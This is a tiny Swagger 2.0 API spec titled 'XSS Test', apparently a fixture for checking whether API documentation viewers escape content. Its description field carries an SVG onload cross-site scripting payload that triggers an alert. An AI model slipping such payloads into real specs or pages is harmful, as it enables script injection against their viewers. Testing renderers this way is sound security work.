swagger: "2.0"
info:
  title: "XSS Test"
  description: "<svg/onload=alert(document.domain)>"
  version: "1.0"
paths:
  /testVatins:
    get:
      summary: "test Vatins"
      responses:
        '200':
          description: "OK"
